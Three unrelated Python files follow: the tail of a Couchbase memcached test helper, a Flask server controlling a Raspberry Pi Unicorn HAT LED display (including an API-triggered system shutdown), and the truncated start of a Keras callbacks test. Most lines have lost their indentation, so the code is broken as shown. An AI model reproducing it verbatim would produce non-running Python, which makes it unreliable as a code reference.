self.reset_vbucket(self.rest, key)
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 3:
self.reset_vbucket(self.rest, key)
vb_error += 1
else:
raise error
def _send_op(self, func, *args):
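        # Retry temporary failures (ERR_ETMPFAIL) with exponential backoff,
        # starting at 1 ms and giving up once the delay would reach 0.5 s.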
backoff = .001
while True:
try:
return func(*args)
except MemcachedError as error:
if error.status == ERR_ETMPFAIL and backoff < .5:
time.sleep(backoff)
backoff *= 2
else:
raise error
            except (EOFError, IOError):
raise MemcachedError(ERR_NOT_MY_VBUCKET, "Connection reset")
def done(self):
[self.memcacheds[ip].close() for ip in self.memcacheds]
class KVStoreAwareSmartClient(VBucketAwareMemcached):
def __init__(self, rest, bucket, kv_store = None, info=None, store_enabled = True):
VBucketAwareMemcached.__init__(self, rest, bucket, info)
self.kv_store = kv_store or ClientKeyValueStore()
self.store_enabled = store_enabled
self._rlock = threading.Lock()
def set(self, key, value, ttl = -1):
self._rlock.acquire()
try:
if ttl >= 0:
self.memcached(key).set(key, ttl, 0, value)
else:
self.memcached(key).set(key, 0, 0, value)
if self.store_enabled:
self.kv_store.write(key, hashlib.md5(value).digest(), ttl)
except MemcachedError as e:
self._rlock.release()
raise MemcachedError(e.status, e.msg)
except AssertionError:
self._rlock.release()
raise AssertionError
except:
self._rlock.release()
raise Exception("General Exception from KVStoreAwareSmartClient.set()")
self._rlock.release()
"""
" retrieve meta data of document from disk
"""
def get_doc_metadata(self, num_vbuckets, key):
vid = crc32.crc32_hash(key) & (num_vbuckets - 1)
mc = self.memcached(key)
metadatastats = None
try:
metadatastats = mc.stats("vkey {0} {1}".format(key, vid))
except MemcachedError:
msg = "key {0} doesn't exist in memcached".format(key)
self.log.info(msg)
return metadatastats
def delete(self, key):
try:
self._rlock.acquire()
opaque, cas, data = self.memcached(key).delete(key)
if self.store_enabled and cas == 0:
self.kv_store.delete(key)
self._rlock.release()
else:
self._rlock.release()
raise MemcachedError(7, "Invalid cas value")
except Exception as e:
self._rlock.release()
raise MemcachedError(7, e)
def get_valid_key(self, key):
return self.get_key_check_status(key, "valid")
def get_deleted_key(self, key):
return self.get_key_check_status(key, "deleted")
def get_expired_key(self, key):
return self.get_key_check_status(key, "expired")
def get_all_keys(self):
return self.kv_store.keys()
def get_all_valid_items(self):
return self.kv_store.valid_items()
def get_all_deleted_items(self):
return self.kv_store.deleted_items()
def get_all_expired_items(self):
return self.kv_store.expired_items()
def get_key_check_status(self, key, status):
item = self.kv_get(key)
if(item is not None and item["status"] == status):
return item
else:
msg = "key {0} is not valid".format(key)
self.log.info(msg)
return None
# safe kvstore retrieval
# return dict of {key,status,value,ttl}
# or None if not found
def kv_get(self, key):
item = None
try:
item = self.kv_store.read(key)
except KeyError:
msg = "key {0} doesn't exist in store".format(key)
#self.log.info(msg)
return item
# safe memcached retrieval
# return dict of {key, flags, seq, value}
# or None if not found
def mc_get(self, key):
item = self.mc_get_full(key)
if item is not None:
item["value"] = hashlib.md5(item["value"]).digest()
return item
# unhashed value
def mc_get_full(self, key):
item = None
try:
x, y, value = self.memcached(key).get(key)
item = {}
item["key"] = key
item["flags"] = x
item["seq"] = y
item["value"] = value
except MemcachedError:
msg = "key {0} doesn't exist in memcached".format(key)
return item
def kv_mc_sync_get(self, key, status):
self._rlock.acquire()
kv_item = self.get_key_check_status(key, status)
mc_item = self.mc_get(key)
self._rlock.release()
return kv_item, mc_item
class KVStoreSmartClientHelper(object):
@staticmethod
def do_verification(client):
keys = client.get_all_keys()
validation_failures = {}
for k in keys:
m, valid = KVStoreSmartClientHelper.verify_key(client, k)
if(valid == False):
validation_failures[k] = m
return validation_failures
@staticmethod
def verify_key(client, key):
status = False
msg = ""
item = client.kv_get(key)
if item is not None:
if item["status"] == "deleted":
msg, status = \
KVStoreSmartClientHelper.verify_delete(client, key)
elif item["status"] == "expired":
msg, status = \
KVStoreSmartClientHelper.verify_expired(client, key)
elif item["status"] == "valid":
msg, status = \
KVStoreSmartClientHelper.verify_set(client, key)
return msg, status
# verify kvstore contains key with valid status
# and that key also exists in memcached with
# expected value
@staticmethod
def verify_set(client, key):
kv_item = client.get_valid_key(key)
mc_item= client.mc_get(key)
status = False
msg = ""
if(kv_item is not None and mc_item is not None):
# compare values
if kv_item["value"] == mc_item["value"]:
status = True
else:
msg = "kvstore and memcached values mismatch"
elif(kv_item is None):
msg = "valid status not set in kv_store"
elif(mc_item is None):
msg = "key missing from memcached"
return msg, status
# verify kvstore contains key with deleted status
# and that it does not exist in memcached
@staticmethod
def verify_delete(client, key):
deleted_kv_item = client.get_deleted_key(key)
mc_item= client.mc_get(key)
status = False
msg = ""
if(deleted_kv_item is not None and mc_item is None):
status = True
elif(deleted_kv_item is None):
msg = "delete status not set in kv_store"
elif(mc_item is not None):
msg = "key still exists in memcached"
return msg, status
# verify kvstore contains key with expired status
# and that key has also expired in memcached
@staticmethod
def verify_expired(client, key):
expired_kv_item = client.get_expired_key(key)
mc_item= client.mc_get(key)
status = False
msg = ""
if(expired_kv_item is not None and mc_item is None):
status = True
elif(expired_kv_item is None):
msg = "exp. status not set in kv_store"
elif(mc_item is not None):
msg = "key still exists in memcached"
return msg, status
def start_reader_process(info, keyset, queue):
ReaderThread(info, keyset, queue).start()
class GeneratedDocuments(object):
def __init__(self, items, kv_template, options=dict(size=1024)):
self._items = items
self._kv_template = kv_template
self._options = options
self._pointer = 0
if "padding" in options:
self._pad = options["padding"]
else:
self._pad = DocumentGenerator._random_string(options["size"])
# Required for the for-in syntax
def __iter__(self):
return self
def __len__(self):
return self._items
def reset(self):
self._pointer = 0
def has_next(self):
return self._pointer != self._items
# Returns the next value of the iterator
def next(self):
if self._pointer == self._items:
raise StopIteration
else:
i = self._pointer
doc = {"meta":{"id": "{0}-{1}".format(i, self._options["seed"])},"json":{}}
for k in self._kv_template:
v = self._kv_template[k]
if isinstance(v, str) and v.find("${prefix}") != -1:
v = v.replace("${prefix}", "{0}".format(i))
#how about the value size
if isinstance(v, str) and v.find("${padding}") != -1:
v = v.replace("${padding}", self._pad)
if isinstance(v, str) and v.find("${seed}") != -1:
v = v.replace("${seed}", "{0}".format(self._options["seed"]))
doc["json"][k] = v
self._pointer += 1
return json.dumps(doc)
class DocumentGenerator(object):
#will loop over all values in props and replace ${prefix} with ${i}
@staticmethod
def make_docs(items, kv_template, options=dict(size=1024, seed=str(uuid.uuid4()))):
return GeneratedDocuments(items, kv_template, options)
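    # Illustrative usage (values here are made up, not taken from a test):
    #   docs = DocumentGenerator.make_docs(100,
    #              {"name": "user-${prefix}", "payload": "doc-${prefix}-${padding}"},
    #              {"size": 256, "seed": str(uuid.uuid4())})
    #   for doc in docs:
    #       ...  # each doc is a JSON string with ${prefix}/${padding}/${seed} expanded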
@staticmethod
def _random_string(length):
return (("%%0%dX" % (length * 2)) % random.getrandbits(length * 8)).encode("ascii")
@staticmethod
def create_value(pattern, size):
return (pattern * (size / len(pattern))) + pattern[0:(size % len(pattern))]
@staticmethod
def get_doc_generators(count, kv_template = None, seed = None, sizes = None):
seed = seed or str(uuid.uuid4())[0:7]
sizes = sizes or [128]
doc_gen_iterators = []
if kv_template is None:
kv_template = {"name": "doc-${prefix}-${seed}",
"sequence": "${seed}",
"email": "${prefix}@couchbase.com"}
for size in sizes:
options = {"size": size, "seed": seed}
docs = DocumentGenerator.make_docs(count / len(sizes),
kv_template, options)
doc_gen_iterators.append(docs)
return doc_gen_iterators
@staticmethod
def get_doc_generators_by_load_ratio(rest,
bucket='default',
ram_load_ratio = 1,
value_size_distribution=None,
seed = None):
log = logger.Logger.get_logger()
if ram_load_ratio < 0 :
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="ram_load_ratio")
if not value_size_distribution:
value_size_distribution = {16: 0.25, 128: 0.25, 512: 0.25, 1024: 0.25}
list = []
info = rest.get_bucket(bucket)
emptySpace = info.stats.ram - info.stats.memUsed
space_to_fill = (int((emptySpace * ram_load_ratio) / 100.0))
log.info('space_to_fill : {0}, emptySpace : {1}'.format(space_to_fill, emptySpace))
for size, probability in value_size_distribution.items():
how_many = int(space_to_fill / (size + 250) * probability)
doc_seed = seed or str(uuid.uuid4())
kv_template = {"name": "user-${prefix}", "payload": "memcached-json-${prefix}-${padding}",
"size": size, "seed": doc_seed}
options = {"size": size, "seed": doc_seed}
payload_generator = DocumentGenerator.make_docs(how_many, kv_template, options)
list.append({'size': size, 'value': payload_generator, 'how_many': how_many, 'seed' : doc_seed})
return list
# docs = DocumentGenerator.make_docs(number_of_items,
# {"name": "user-${prefix}", "payload": "payload-${prefix}-${padding}"},
# {"size": 1024, "seed": str(uuid.uuid4())})
#Format of the json documents that mcsoda uses.
# JSON BODY
# {
# "key":"%s",
# "key_num":%s,
# "name":"%s",
# "email":"%s",
# "city":"%s",
# "country":"%s",
# "realm":"%s",
# "coins":%s,
# "achievements":%s
# }
class LoadWithMcsoda(object):
def __init__(self, master, num_docs, prefix='', bucket='default', user='Administrator',
password='', protocol='membase-binary', port=11211):
rest = RestConnection(master)
self.bucket = bucket
vBuckets = rest.get_vbuckets(self.bucket)
self.vbucket_count = len(vBuckets)
self.cfg = {
'max-items': num_docs,
'max-creates': num_docs,
'min-value-size': 128,
'exit-after-creates': 1,
'ratio-sets': 1,
'ratio-misses': 0,
'ratio-creates': 1,
'ratio-deletes': 0,
'ratio-hot': 0,
'ratio-hot-sets': 1,
'ratio-hot-gets': 0,
'ratio-expirations': 0,
'expiration': 0,
'threads': 1,
'json': 1,
'batch': 10,
'vbuckets': self.vbucket_count,
'doc-cache': 0,
'doc-gen':0,
'prefix': prefix,
'socket-timeout': 60,
}
self.protocol = protocol
self.user = user
self.pswd = password
if protocol == 'membase-binary':
self.host_port = "{0}:{1}:{2}".format(master.ip, master.port, port)
elif protocol == 'memcached-binary':
self.host_port = "{0}:{1}:{1}".format(master.ip, port)
self.ctl = { 'run_ok': True }
def protocol_parse(self, protocol_in):
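        # Example (illustrative): protocol_parse("membase://Administrator:password@10.1.2.3")
        # returns ('membase-binary', '10.1.2.3:8091', 'Administrator', 'password').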
if protocol_in.find('://') >= 0:
protocol = \
'-'.join(((["membase"] + \
protocol_in.split("://"))[-2] + "-binary").split('-')[0:2])
host_port = ('@' + protocol_in.split("://")[-1]).split('@')[-1] + ":8091"
user, pswd = (('@' + protocol_in.split("://")[-1]).split('@')[-2] + ":").split(':')[0:2]
return protocol, host_port, user, pswd
def get_cfg(self):
return self.cfg
def load_data(self):
cur, start_time, end_time = mcsoda.run(self.cfg, {}, self.protocol, self.host_port, self.user, \
self.pswd, ctl=self.ctl, bucket=self.bucket)
return cur
def load_stop(self):
self.ctl['run_ok'] = False
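# Minimal usage sketch (illustrative; assumes `master` is a TestInputServer-style
# object with .ip and .port, as used elsewhere in this module):
#   loader = LoadWithMcsoda(master, 10000, prefix='load-', bucket='default')
#   loader.load_data()    # runs mcsoda synchronously until the creates finish
#   loader.load_stop()    # or call earlier from another thread to stop the run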
|
server.py
|
#!/usr/bin/env python3
import os
import json
from jsmin import jsmin
import threading
import glob
from lib.unicorn_wrapper import UnicornWrapper
from time import sleep
from datetime import datetime
from gpiozero import CPUTemperature
from flask import Flask, jsonify, make_response, request, redirect, url_for, send_from_directory, render_template
from random import randint
# Initialize the Unicorn hat
unicorn = UnicornWrapper()
blinkThread = None
globalRed = 0
globalGreen = 0
globalBlue = 0
globalBrightness = 0
globalIcon = 'none'
globalShutdown= None
globalLastCalled = None
globalLastCalledApi = None
globalStatus = 'off'
#get the width and height of the hardware and set it to portrait if it's not
width, height = unicorn.getShape()
class MyFlaskApp(Flask):
def run(self, host=None, port=None, debug=None, load_dotenv=True, **options):
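        # With Flask's debug reloader the module is imported twice; WERKZEUG_RUN_MAIN
        # is only set to 'true' in the reloader's child process, so the startup
        # rainbow runs exactly once.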
if not self.debug or os.getenv('WERKZEUG_RUN_MAIN') == 'true':
with self.app_context():
startupRainbow()
super(MyFlaskApp, self).run(host=host, port=port, debug=debug, load_dotenv=load_dotenv, **options)
app = MyFlaskApp(__name__)
def validateJson(j):
try:
if j['size']['height'] != height:
return False, f"Height is wrong, expected: {height} got: {j['size']['height']}"
if j['size']['width'] != width:
            return False, f"Width is wrong, expected: {width} got: {j['size']['width']}"
if len(j['pixels']) != height:
return False, "Parsing json found wrong number of rows"
for x in range(len(j['pixels'])):
if len(j['pixels'][x]) != width:
return False, f"Parsing json found wrong number of columns in row {x+1}"
return True, ''
except KeyError as err:
        return False, f"An error occurred, Missing JSON Key: {err}"
def setPixels(r, g, b, brightness = 0.5, jsonObj = None):
global globalIcon, globalBrightness, globalBlue, globalGreen, globalRed
globalRed = r
globalGreen = g
globalBlue = b
if brightness is not None:
globalBrightness = brightness
unicorn.setBrightness(brightness)
if jsonObj is not None:
globalIcon = jsonObj['name']
for x in range(width):
for y in range(height):
pixel = jsonObj['pixels'][y][x]
if pixel['red'] == -1:
red = r
else:
red = pixel['red']
if pixel['green'] == -1:
green = g
else:
green = pixel['green']
if pixel['blue'] == -1:
blue = b
else:
blue = pixel['blue']
unicorn.setPixel(x, y, red, green, blue)
else:
globalIcon="none"
unicorn.setColour(r,g,b)
def setDisplay(r, g, b, brightness = 0.5, speed = None, jsonObj = None):
global crntColors, globalIcon, globalBrightness, globalBlue, globalGreen, globalRed
globalBrightness = brightness
    globalRed = -1
    globalGreen = -1
    globalBlue = -1
globalIcon = "Rainbow"
setPixels(r, g, b, brightness, jsonObj)
unicorn.show()
if speed != None and speed != '' :
sleep(speed)
unicorn.clear()
crntT = threading.currentThread()
while getattr(crntT, "do_run", True) :
setPixels(r, g, b, brightness, jsonObj)
unicorn.show()
sleep(speed)
unicorn.clear()
unicorn.show()
sleep(speed)
def displayRainbow(step, brightness, speed, run = None, hue = None):
global crntColors
if hue == None:
hue = 0
if step is None:
step = 1
if speed is None:
        speed = 0.2
if brightness is None:
brightness = 0.5
crntT = threading.currentThread()
while getattr(crntT, "do_run", True):
unicorn.setColour(RGB = unicorn.hsvIntToRGB(hue,100,100))
sleep(speed)
if hue >= 360:
hue = 0
if run is not None:
run = run - 1
if run <= 0:
switchOff()
else:
hue = hue + step
def halfBlink():
unicorn.show()
sleep(0.8)
unicorn.clear()
unicorn.show()
sleep(0.2)
def countDown(time):
crntT = threading.currentThread()
showTime = time - 12
while getattr(crntT, "do_run", True) and showTime > 0:
setPixels(255, 255, 0, 0.5, jsonObj = getIcon("arrow-down"))
unicorn.show()
sleep(1)
unicorn.clear()
unicorn.show()
sleep(1)
showTime = showTime - 2
i = 10
    while getattr(crntT, "do_run", True) and i > 0:
i = i - 1
obj = getIcon(f"numbers/{i}")
setPixels(255, 255, 0, 0.5, jsonObj=obj)
halfBlink()
setDisplay(255, 0, 0, 0.5)
halfBlink()
unicorn.clear()
unicorn.off()
def getIcon(icon):
try:
        with open(f"./icons/{unicorn.getType()}/{icon}.json", "r") as f:
            return json.loads(jsmin(f.read()))
except ValueError:
return False
except IOError:
return False
def switchOn():
global blinkThread, globalBlue, globalGreen, globalRed
rgb = unicorn.hsvIntToRGB(randint(0,360),100,100)
blinkThread = threading.Thread(target=setDisplay, args=(rgb[0], rgb[1], rgb[2]))
blinkThread.do_run = True
blinkThread.start()
def switchOff() :
global blinkThread, globalBlue, globalGreen, globalRed
globalRed = 0
globalGreen = 0
globalBlue = 0
if blinkThread != None :
blinkThread.do_run = False
if blinkThread.is_alive():
blinkThread.join()
unicorn.clear()
unicorn.off()
def shutdownPi() :
global blinkThread, globalShutdown, globalBlue, globalGreen, globalRed
globalShutdown = "Shutting Down!"
globalRed = None
globalBlue = None
globalGreen = None
blinkThread = threading.Thread(target=countDown, args=(60,))
blinkThread.do_run = True
blinkThread.start()
    os.system("shutdown +2 'Shutdown triggered via API... Shutting down in 2 minutes'")
def cancelShutdown() :
global blinkThread, globalShutdown, globalBlue, globalGreen, globalRed
globalShutdown = None
globalRed = None
globalBlue = None
globalGreen = None
os.system("shutdown -c 'Shutdown cancelled!... Carry on folks!'")
blinkThread.do_run = False
unicorn.clear()
unicorn.off()
switchOn()
def setTimestamp() :
global globalLastCalled
globalLastCalled = datetime.now()
# API Initialization
@app.route('/api/on', methods=['GET'])
def apiOn() :
global globalLastCalledApi, globalShutdown
if globalShutdown:
return jsonify({"message": "Shutting Down!"})
globalLastCalledApi = '/api/on'
switchOff()
switchOn()
setTimestamp()
return jsonify({})
@app.route('/api/off', methods=['GET'])
def apiOff() :
global crntColors, globalLastCalledApi, globalShutdown
if globalShutdown:
return jsonify({"message": "Shutting Down!"})
globalLastCalledApi = '/api/off'
crntColors = None
switchOff()
setTimestamp()
return jsonify({})
@app.route('/api/shutdown', methods=['DELETE'])
def turnOff() :
global globalLastCalledApi, globalShutdown
if globalShutdown:
return jsonify({"message": "Shutting Down!"})
globalLastCalledApi = '/api/shutdown'
setTimestamp()
switchOff()
shutdownPi()
return make_response(jsonify({"message": "Shutdown Triggered!"}))
@app.route('/api/countdown', methods=['GET'])
def apiCountDown():
global blinkThread, globalShutdown
if globalShutdown:
return jsonify({"message": "Shutting Down!"})
blinkThread = threading.Thread(target=countDown, args=(14,))
blinkThread.do_run = True
blinkThread.start()
return make_response(jsonify({"message": "14 second countdown started"}))
@app.route('/api/icons', methods=['GET'])
def getIcons():
path = f"./icons/{unicorn.getType()}/"
files = glob.glob(f"{path}**/*.json", recursive=True)
icons = []
for file in files:
icons.append(file.replace(path, "").split('.')[0])
return make_response(jsonify({"unicorn": unicorn.getType(), "height": height, "width": width, "icons": icons}))
# This method is added for homekit compatibility
@app.route('/api/display/hsv', methods=['POST'])
def apiDisplayHsv():
global blinkThread, globalLastCalledApi, globalShutdown
if globalShutdown:
return jsonify({"message": "Shutting Down!"})
globalLastCalledApi = '/api/display/hsv'
switchOff()
    content = json.loads(jsmin(request.get_data(as_text=True)))
hue = content.get('hue', 0)
saturation = content.get('saturation', 0)
value = content.get('value', 0)
rgb = unicorn.hsvIntToRGB(hue, saturation, value)
brightness = content.get('brightness', 0.5)
speed = content.get('speed', '')
blinkThread = threading.Thread(target=setDisplay, args=(rgb[0], rgb[1], rgb[2], brightness, speed))
blinkThread.do_run = True
blinkThread.start()
setTimestamp()
return make_response(jsonify())
@app.route('/api/display/rainbow', methods=['POST'])
def apiDisplayRainbow():
global blinkThread, globalLastCalledApi, globalShutdown
if globalShutdown:
return jsonify({"message": "Shutting Down!"})
    globalLastCalledApi = '/api/display/rainbow'
    switchOff()
    content = json.loads(jsmin(request.get_data(as_text=True)))
hue = content.get('hue', 0)
step = content.get('step', None)
brightness = content.get('brightness', None)
speed = content.get('speed', None)
blinkThread = threading.Thread(target=displayRainbow, args=(step, brightness, speed, None, hue))
blinkThread.do_run = True
blinkThread.start()
setTimestamp()
return make_response(jsonify())
# This is the original method for setting the display
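# Example request body (illustrative):
#   {"red": 255, "green": 0, "blue": 0, "brightness": 0.5, "speed": 1}
# When 'speed' is given the display blinks on/off every `speed` seconds; omit it for a solid colour.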
@app.route('/api/display/rgb', methods=['POST'])
def apiDisplayRgb():
global blinkThread, globalLastCalledApi, globalShutdown
if globalShutdown:
return jsonify({"message": "Shutting Down!"})
globalLastCalledApi = '/api/display/rgb'
switchOff()
    content = json.loads(jsmin(request.get_data(as_text=True)))
r = content.get('red', '')
g = content.get('green', '')
b = content.get('blue', '')
brightness = content.get('brightness', None)
speed = content.get('speed', None)
blinkThread = threading.Thread(target=setDisplay, args=(r, g, b, brightness, speed))
blinkThread.do_run = True
blinkThread.start()
setTimestamp()
return make_response(jsonify())
# Added this to allow for simple icons/pixel art
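# Example request body (illustrative; "dnd" is the icon the /busy route below uses):
#   {"icon": "dnd", "red": 255, "green": 0, "blue": 0, "brightness": 0.7, "speed": 1}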
@app.route('/api/display/icon', methods=['POST'])
def apiDisplayIcon():
global blinkThread, globalLastCalledApi, globalShutdown
if globalShutdown:
return jsonify({"message": "Shutting Down!"})
globalLastCalledApi = '/api/display/icon'
switchOff()
    content = json.loads(jsmin(request.get_data(as_text=True)))
icon = content.get('icon', None)
red = content.get('red', '')
green = content.get('green', '')
blue = content.get('blue', '')
brightness = content.get('brightness', None)
speed = content.get('speed', None)
jsonObj = getIcon(icon)
if not jsonObj:
return make_response(jsonify({'error': 'Invalid Icon name', 'message': f"No icon file matches ./icons/{unicorn.getType()}/{icon}.json... Maybe think about creating it?" }), 500)
blinkThread = threading.Thread(target=setDisplay, args=(red, green, blue, brightness, speed, jsonObj))
blinkThread.do_run = True
blinkThread.start()
setTimestamp()
return make_response(jsonify())
# This allows for development of new icons so you
# can test the raw JSON before you create an icon
# json file.
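# Example request body (illustrative, for a hypothetical 2x2 matrix; 'pixels' must have
# `height` rows of `width` entries, and a channel value of -1 means "use the top-level colour"):
#   {"red": 0, "green": 255, "blue": 0, "brightness": 0.5, "speed": 1,
#    "json": {"name": "demo",
#             "size": {"height": 2, "width": 2},
#             "pixels": [[{"red": -1, "green": -1, "blue": -1}, {"red": 0, "green": 0, "blue": 0}],
#                        [{"red": 0, "green": 0, "blue": 0}, {"red": -1, "green": -1, "blue": -1}]]}}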
@app.route('/api/display/json', methods=['POST'])
def apiDisplayJson():
global blinkThread, globalLastCalledApi, globalShutdown
if globalShutdown:
return jsonify({"message": "Shutting Down!"})
globalLastCalledApi = '/api/display/json'
switchOff()
    content = json.loads(jsmin(request.get_data(as_text=True)))
    jsonObj = content.get('json', None)
valid, message = validateJson(jsonObj)
if not valid:
return make_response(jsonify({'error': 'Invalid Json', 'message': message}), 500)
red = content.get('red', '')
green = content.get('green', '')
blue = content.get('blue', '')
brightness = content.get('brightness', None)
speed = content.get('speed', None)
blinkThread = threading.Thread(target=setDisplay, args=( red, green, blue, brightness, speed, jsonObj))
blinkThread.do_run = True
blinkThread.start()
setTimestamp()
return make_response(jsonify())
@app.route('/api/status', methods=['GET'])
def apiStatus():
global globalBlue, globalGreen, globalRed, globalBrightness, globalIcon, \
globalLastCalled, globalLastCalledApi, width, height, unicorn
cpu = CPUTemperature()
return jsonify({ 'red': globalRed, 'green': globalGreen,
'blue': globalBlue, 'brightness': globalBrightness,
'icon': globalIcon, 'lastCalled': globalLastCalled,
'cpuTemp': cpu.temperature, 'lastCalledApi': globalLastCalledApi,
'height': height, 'width': width, 'unicorn': unicorn.getType() })
#Non-API routes for the frontend
@app.route('/', methods=['GET'])
def root():
global globalShutdown, globalLastCalledApi, globalBlue, globalGreen, globalRed, globalStatus
return render_template("index.html", status=globalStatus, r=globalRed, g=globalGreen, b=globalBlue, shutdown=globalShutdown)
@app.route('/off', methods=['GET'])
def offCall():
global globalShutdown, globalLastCalledApi, globalStatus
if globalShutdown:
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
globalLastCalledApi='Frontend: Off'
globalStatus='off'
switchOff()
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
@app.route('/on', methods=['GET'])
def onCall():
global globalShutdown, globalLastCalledApi, globalBlue, globalGreen, globalRed, globalStatus
if globalShutdown:
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
globalLastCalledApi='Frontend: On'
globalStatus='on'
switchOff()
switchOn()
return render_template("index.html", status=globalStatus, r=globalRed, g=globalGreen, b=globalBlue, shutdown=globalShutdown)
@app.route('/busy', methods=['POST'])
def busyCall():
global globalShutdown, globalLastCalledApi, blinkThread, globalStatus
if globalShutdown:
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
globalLastCalledApi='Frontend: Busy'
globalStatus='busy'
switchOff()
jsonObj = getIcon("dnd")
blinkThread = threading.Thread(target=setDisplay, args=(255, 0, 0, 0.7, 1, jsonObj))
blinkThread.do_run = True
blinkThread.start()
setTimestamp()
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
@app.route('/available', methods=['POST'])
def availableCall():
global globalShutdown, globalLastCalledApi, blinkThread, globalStatus
if globalShutdown:
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
globalLastCalledApi='Frontend: Available'
globalStatus="available"
switchOff()
blinkThread = threading.Thread(target=setDisplay, args=(0, 255, 0, 0.5))
blinkThread.do_run = True
blinkThread.start()
setTimestamp()
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
@app.route('/away', methods=['POST'])
def awayCall():
global globalShutdown, globalLastCalledApi, blinkThread, globalStatus
if globalShutdown:
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
globalLastCalledApi='Frontend: Away'
globalStatus='away'
switchOff()
blinkThread = threading.Thread(target=setDisplay, args=(255, 255, 0, 0.5))
blinkThread.do_run = True
blinkThread.start()
setTimestamp()
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
@app.route('/rainbow', methods=['POST'])
def rainbowCall():
global blinkThread, globalLastCalledApi, globalStatus
if globalShutdown:
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
globalLastCalledApi='Frontend: Rainbow'
globalStatus='rainbow'
switchOff()
blinkThread = threading.Thread(target=displayRainbow, args=(1, 0.5, 0.2, None, 0))
blinkThread.do_run = True
blinkThread.start()
setTimestamp()
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
@app.route('/shutdown', methods=['POST'])
def shutdownCall():
global globalShutdown, globalLastCalledApi, globalBlue, globalGreen, globalRed, globalStatus
if globalShutdown:
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
globalLastCalledApi='Frontend: Shutdown'
globalStatus='shutdown'
switchOff()
shutdownPi()
setTimestamp()
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
@app.route('/cancel-shutdown', methods=['POST'])
def cancelShutdownCall():
global globalShutdown, globalLastCalledApi, globalBlue, globalGreen, globalRed, globalStatus
globalLastCalledApi='Frontend: Cancel Shutdown'
globalStatus='off'
switchOff()
cancelShutdown()
setTimestamp()
return render_template("index.html", shutdown=globalShutdown, status=globalStatus)
@app.errorhandler(404)
def not_found(error):
return make_response(jsonify({'error': 'Not found'}), 404)
def startupRainbow():
global blinkThread, globalStatus
globalStatus = 'off'
blinkThread = threading.Thread(target=displayRainbow, args=(10, 1, 0.1, 1))
blinkThread.do_run = True
blinkThread.start()
blinkThread.join()
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=False)
|
callbacks_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
import tensorflow.compat.v2 as tf
import collections
import csv
import json
import os
import re
import shutil
import sys
import threading
import time
import unittest
from unittest import mock
from absl.testing import parameterized
import numpy as np
import keras
from keras import keras_parameterized
from keras import testing_utils
from keras.callbacks import BackupAndRestore
from keras.callbacks import BackupAndRestoreExperimental
from keras.engine import sequential
from keras.layers import Activation
from keras.layers import Dense
from keras.optimizer_v2 import gradient_descent
from keras.optimizer_v2 import learning_rate_schedule
from keras.utils import io_utils
from keras.utils import np_utils
from tensorflow.python.platform import tf_logging as logging
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
CALLBACK_HOOKS = [
'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin',
'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end',
'on_test_begin', 'on_test_end', 'on_train_batch_begin',
'on_train_batch_end', 'on_train_begin', 'on_train_end'
]
class Counter(keras.callbacks.Callback):
"""Counts the number of times each callback method was run.
Attributes:
    method_counts: dict. Contains the counts of times each callback method was
      run.
"""
def __init__(self):
self.method_counts = collections.defaultdict(int)
for method_name in CALLBACK_HOOKS:
setattr(self, method_name,
self.wrap_with_counts(method_name, getattr(self, method_name)))
def wrap_with_counts(self, method_name, method):
def _call_and_count(*args, **kwargs):
self.method_counts[method_name] += 1
return method(*args, **kwargs)
return _call_and_count
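# For reference, the wrapping above means each hook bumps its own entry in
# method_counts before delegating to the base Callback implementation, e.g.
# (illustrative usage only, not part of the tests below):
#
#   counter = Counter()
#   counter.on_epoch_end(epoch=0)
#   counter.method_counts['on_epoch_end']  # -> 1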
class CallAllHooks(keras.callbacks.Callback):
"""A callback that calls self._run for all hooks"""
def __init__(self):
for method_name in CALLBACK_HOOKS:
setattr(self, method_name, self._run)
def _run(self, *args, logs=None):
raise NotImplementedError
def _get_numpy():
return np.ones((10, 10)), np.ones((10, 1))
def _get_sequence():
class MySequence(keras.utils.data_utils.Sequence):
def __getitem__(self, _):
return np.ones((2, 10)), np.ones((2, 1))
def __len__(self):
return 5
return MySequence(), None
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class CallbackCountsTest(keras_parameterized.TestCase):
def _check_counts(self, counter, expected_counts):
"""Checks that the counts registered by `counter` are those expected."""
for method_name, expected_count in expected_counts.items():
self.assertEqual(
counter.method_counts[method_name],
expected_count,
msg='For method {}: expected {}, got: {}'.format(
method_name, expected_count, counter.method_counts[method_name]))
def _get_model(self):
layers = [
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
tf.compat.v1.train.AdamOptimizer(0.001),
'binary_crossentropy',
run_eagerly=testing_utils.should_run_eagerly())
return model
@parameterized.named_parameters(('with_numpy', _get_numpy()),
